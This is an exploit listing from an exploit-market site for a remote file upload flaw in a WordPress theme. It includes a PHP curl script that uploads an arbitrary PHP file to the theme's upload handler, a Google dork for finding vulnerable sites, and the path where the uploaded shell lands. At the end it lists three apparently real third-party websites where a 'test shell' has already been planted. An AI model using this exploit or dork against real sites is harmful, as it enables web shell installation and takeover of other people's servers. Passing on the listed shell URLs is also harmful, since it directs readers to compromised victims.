[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WordPress radial-theme Themes Remote File Upload Vulnerability

Author
iskorpitx
Risk
[
Security Risk High
]
0day-ID
0day-ID-21513
Category
web applications
Date add
13-11-2013
Platform
php
###################################################################################################
# Exploit Title: WordPress radial-theme Themes Remote File Upload Vulnerability
# Author: iskorpitx
# Date: 12/11/2013
# Vendor Homepage: http://www.orange-themes.com/
# Themes Link: http://www.orange-themes.com/portfolio/radial/
# Infected File: upload-handler.php
# Category: webapps
# Google dork: "/wp-content/themes/radial-theme/"
# Tested on : Windows/Linux
###################################################################################################

# Exploit


<?php 
$uploadfile="upload.php"; 
$ch = curl_init("http://127.0.0.1/wp-content/themes/radial-theme/functions/upload-handler.php"); 
curl_setopt($ch, CURLOPT_POST, true); 
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('orange_themes'=>"@$uploadfile")); 
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
$postResult = curl_exec($ch); 
curl_close($ch); 
print "$postResult"; 
?>

http://127.0.0.1/wordpress/wp-content/uploads/2013/11/upload.php


_________________________________

All http://www.mavi1.org members


---
test shell

http://www.lightningcomposites.com.au/wp-content/uploads/2013/11/ttt.php
http://www.bigdaddysclassics.com/wp-content/uploads/2013/11/ttt.php
http://michaelangelosautotrim.com/wp-content/uploads/2013/11/ttt.php

#  0day.today [2024-12-26]  #